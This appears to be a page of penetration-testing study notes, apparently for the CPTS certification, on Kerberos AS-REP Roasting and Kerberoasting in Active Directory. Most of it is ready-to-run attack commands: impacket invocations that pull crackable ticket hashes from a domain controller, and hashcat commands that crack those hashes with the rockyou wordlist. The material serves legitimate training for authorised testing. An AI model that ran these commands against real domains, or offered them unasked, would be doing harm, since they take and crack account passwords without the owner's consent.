ZeroBox

Kerberos Exploitation: AS-REP & Kerberoasting

Kerberos ticket attacks: AS-REP Roasting for preauth-disabled accounts and Kerberoasting Service Principal Names.

impackethashcatrubeus

Kerberos attacks allow attackers to extract encrypted password hashes from Domain Controllers without triggering account lockouts.

1. AS-REP Roasting (No Pre-Authentication)

Target users that have DONT_REQ_PREAUTH enabled:

impacket-GetNPUsers {DOMAIN}/ -usersfile users.txt -dc-ip {TARGET_IP} -format hashcat -outputfile asreproast.hashes

Crack with Hashcat Mode 18200:

hashcat -m 18200 asreproast.hashes /usr/share/wordlists/rockyou.txt -O

2. Kerberoasting (Service Principal Names)

Request TGS tickets for accounts configured with an SPN:

impacket-GetUserSPNs {DOMAIN}/{USER}:{PASSWORD} -dc-ip {TARGET_IP} -request -outputfile hashes.kerberoast

Crack with Hashcat Mode 13100:

hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -O

Reference Hashcat mode numbers in 10. Password Cracking & Hash Identification.

More CPTS notes

Keep these notes in your own private vault. Open CPTS notes in ZeroBox